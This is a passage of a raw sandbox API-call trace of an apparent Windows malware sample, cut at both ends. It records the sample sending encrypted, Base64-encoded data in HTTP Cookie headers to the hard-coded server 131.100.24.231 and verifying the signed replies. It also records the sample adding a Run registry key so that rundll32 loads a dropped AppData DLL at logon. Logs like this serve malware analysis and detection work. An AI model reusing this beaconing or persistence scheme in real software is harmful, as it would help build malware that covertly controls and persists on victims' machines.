_Dest="Cookie: PeVgbuO=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTkquX0ddAMrdew4jiIWqrDqa9qD8ObVzsU9lAqeYNYqgsgVDAemRvf/sg/bORBTzJi26MzKTLnOBjh1BnQp2ESAptb1HHgQtu5lULVbj4G8OHH1kT9JlKd8EOkcjxzdiuqlmqAzY8gT49p/SuGvfQTGEFkgM2CsM5QE=\r\n") returned 394 [0599.731] GetProcessHeap () returned 0x530000 [0599.731] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63080 | out: hHeap=0x530000) returned 1 [0599.731] GetProcessHeap () returned 0x530000 [0599.731] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5eacb0 | out: hHeap=0x530000) returned 1 [0599.731] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0599.732] GetProcessHeap () returned 0x530000 [0599.732] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0599.732] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0599.734] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="XkEOqreeJDfpFdyRRpleVtPAyEdT", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0599.735] GetProcessHeap () returned 0x530000 [0599.735] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0599.735] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0599.735] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0599.735] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0599.735] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: PeVgbuO=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTkquX0ddAMrdew4jiIWqrDqa9qD8ObVzsU9lAqeYNYqgsgVDAemRvf/sg/bORBTzJi26MzKTLnOBjh1BnQp2ESAptb1HHgQtu5lULVbj4G8OHH1kT9JlKd8EOkcjxzdiuqlmqAzY8gT49p/SuGvfQTGEFkgM2CsM5QE=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0600.991] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0600.992] GetProcessHeap () returned 0x530000 [0600.992] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0600.992] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x298) returned 1 [0600.992] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b48098, dwNumberOfBytesToRead=0xfd68, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b48098*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0600.992] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0600.992] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0600.992] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0600.992] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0600.993] GetProcessHeap () returned 0x530000 [0600.993] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0600.993] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf51c) returned 0x0 [0600.993] GetProcessHeap () returned 0x530000 [0600.993] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0600.993] GetProcessHeap () returned 0x530000 [0600.993] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0600.993] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0600.994] GetProcessHeap () returned 0x530000 [0600.994] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0600.994] GetProcessHeap () returned 0x530000 [0600.994] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0600.994] GetProcessHeap () returned 0x530000 [0600.994] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fe0 [0600.994] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0600.994] GetProcessHeap () returned 0x530000 [0600.995] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fe0 | out: hHeap=0x530000) returned 1 [0600.995] GetProcessHeap () returned 0x530000 [0600.995] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0600.995] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0600.995] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a76468, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0600.995] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0600.995] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0600.995] GetProcessHeap () returned 0x530000 [0600.995] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0600.995] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0600.995] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a76424, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0600.998] GetProcessHeap () returned 0x530000 [0600.998] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c640 [0600.999] GetProcessHeap () returned 0x530000 [0601.000] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0601.000] GetProcessHeap () returned 0x530000 [0601.000] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0601.000] GetProcessHeap () returned 0x530000 [0601.001] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a49848 | out: hHeap=0x530000) returned 1 [0601.001] GetProcessHeap () returned 0x530000 [0601.001] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0601.001] GetProcessHeap () returned 0x530000 [0601.001] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0601.001] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0601.001] GetProcessHeap () returned 0x530000 [0601.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83b20 [0601.001] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",trcbClsr") returned 98 [0601.001] GetProcessHeap () returned 0x530000 [0601.002] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83b20 | out: hHeap=0x530000) returned 1 [0601.002] GetProcessHeap () returned 0x530000 [0601.002] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0601.002] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x648, lpdwDisposition=0x0) returned 0x0 [0601.002] GetProcessHeap () returned 0x530000 [0601.002] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0601.002] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",trcbClsr") returned 98 [0601.002] RegSetValueExW (in: hKey=0x648, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",trcbClsr", cbData=0xc6 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",trcbClsr") returned 0x0 [0601.003] RegCloseKey (hKey=0x648) returned 0x0 [0601.004] GetProcessHeap () returned 0x530000 [0601.004] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c640 | out: hHeap=0x530000) returned 1 [0601.004] GetProcessHeap () returned 0x530000 [0601.004] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aceb70 | out: hHeap=0x530000) returned 1 [0601.004] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xe64b6) returned 0x102 [0611.009] GetProcessHeap () returned 0x530000 [0611.009] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0611.009] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0611.009] GetProcessHeap () returned 0x530000 [0611.009] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0611.009] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0611.009] GetProcessHeap () returned 0x530000 [0611.009] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0611.009] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0611.009] GetProcessHeap () returned 0x530000 [0611.009] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0611.010] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83b20 [0611.011] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0611.011] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0611.011] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0611.011] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0611.011] FindNextFileW (in: hFindFile=0x2a83b20, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0611.011] FindClose (in: hFindFile=0x2a83b20 | out: hFindFile=0x2a83b20) returned 1 [0611.011] GetProcessHeap () returned 0x530000 [0611.011] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x2aceb70 [0611.013] GetProcessHeap () returned 0x530000 [0611.013] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7260 [0611.013] GetProcessHeap () returned 0x530000 [0611.013] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2acc810 [0611.014] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0611.015] GetProcessHeap () returned 0x530000 [0611.015] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7260 | out: hHeap=0x530000) returned 1 [0611.015] GetProcessHeap () returned 0x530000 [0611.015] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2acc810 | out: hHeap=0x530000) returned 1 [0611.015] GetProcessHeap () returned 0x530000 [0611.015] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fe0 [0611.015] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0611.015] GetProcessHeap () returned 0x530000 [0611.016] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fe0 | out: hHeap=0x530000) returned 1 [0611.016] GetProcessHeap () returned 0x530000 [0611.016] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0611.016] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0611.016] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0611.016] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0611.016] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0611.016] GetProcessHeap () returned 0x530000 [0611.016] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0611.016] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0611.016] GetProcessHeap () returned 0x530000 [0611.016] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0611.018] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0611.018] GetProcessHeap () returned 0x530000 [0611.018] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a763b8 [0611.018] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76420, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a763b8, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a763b8, pcbResult=0x2cf4b4) returned 0x0 [0611.018] GetProcessHeap () returned 0x530000 [0611.019] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x104) returned 0x2a5b260 [0611.020] GetProcessHeap () returned 0x530000 [0611.021] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a763b8 | out: hHeap=0x530000) returned 1 [0611.021] GetProcessHeap () returned 0x530000 [0611.021] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0611.021] CryptBinaryToStringW (in: pbBinary=0x2a5b260, cbBinary=0x104, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0611.021] GetProcessHeap () returned 0x530000 [0611.021] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2ba) returned 0x2b465a8 [0611.021] CryptBinaryToStringW (in: pbBinary=0x2a5b260, cbBinary=0x104, dwFlags=0x40000001, pszString=0x2b465a8, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTiL54vgA9mZ3TceFAWVYZc2Jl532TnWFWaUTqtBR/LvuG16qFhTNVLg3fw0e9bf8ZaBpE7T1Y3WVZe5vGsuLQEETZ7qeFxQivSAL+LyKJr7RGYGa0cm3KjUhpTnRG4OFApwQ7nE=", pcchString=0x2cf504) returned 1 [0611.021] GetProcessHeap () returned 0x530000 [0611.021] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0611.022] GetProcessHeap () returned 0x530000 [0611.022] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b630d0 [0611.022] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: GwLIfSsJAOup=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTiL54vgA9mZ3TceFAWVYZc2Jl532TnWFWaUTqtBR/LvuG16qFhTNVLg3fw0e9bf8ZaBpE7T1Y3WVZe5vGsuLQEETZ7qeFxQivSAL+LyKJr7RGYGa0cm3KjUhpTnRG4OFApwQ7nE=\r\n") returned 371 [0611.022] GetProcessHeap () returned 0x530000 [0611.022] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b630d0 | out: hHeap=0x530000) returned 1 [0611.022] GetProcessHeap () returned 0x530000 [0611.023] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b465a8 | out: hHeap=0x530000) returned 1 [0611.023] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0611.023] GetProcessHeap () returned 0x530000 [0611.023] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0611.023] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0611.024] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="vRsBkRRVGMBCUOuWdZcAAAxpxQnFiBltgrIpnZYEhBJSSfFN", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0611.025] GetProcessHeap () returned 0x530000 [0611.025] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0611.025] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0611.025] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0611.025] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0611.025] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: GwLIfSsJAOup=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTiL54vgA9mZ3TceFAWVYZc2Jl532TnWFWaUTqtBR/LvuG16qFhTNVLg3fw0e9bf8ZaBpE7T1Y3WVZe5vGsuLQEETZ7qeFxQivSAL+LyKJr7RGYGa0cm3KjUhpTnRG4OFApwQ7nE=\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0653.110] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0653.110] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0653.110] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0653.110] GetProcessHeap () returned 0x530000 [0653.111] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a5b260 | out: hHeap=0x530000) returned 1 [0653.111] GetProcessHeap () returned 0x530000 [0653.112] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0653.112] GetProcessHeap () returned 0x530000 [0653.112] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0653.112] GetProcessHeap () returned 0x530000 [0653.112] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7110 [0653.112] GetProcessHeap () returned 0x530000 [0653.112] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x5cd2a0 [0653.112] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0653.115] GetProcessHeap () returned 0x530000 [0653.115] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7110 | out: hHeap=0x530000) returned 1 [0653.115] GetProcessHeap () returned 0x530000 [0653.115] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5cd2a0 | out: hHeap=0x530000) returned 1 [0653.115] GetProcessHeap () returned 0x530000 [0653.115] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62f90 [0653.116] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0653.116] GetProcessHeap () returned 0x530000 [0653.116] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62f90 | out: hHeap=0x530000) returned 1 [0653.116] GetProcessHeap () returned 0x530000 [0653.116] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0653.116] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0653.116] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2aceb70, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0653.116] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0653.116] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0653.116] GetProcessHeap () returned 0x530000 [0653.117] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0653.117] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0653.117] GetProcessHeap () returned 0x530000 [0653.117] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76420 [0653.119] BCryptEncrypt (in: hKey=0x5bd870, 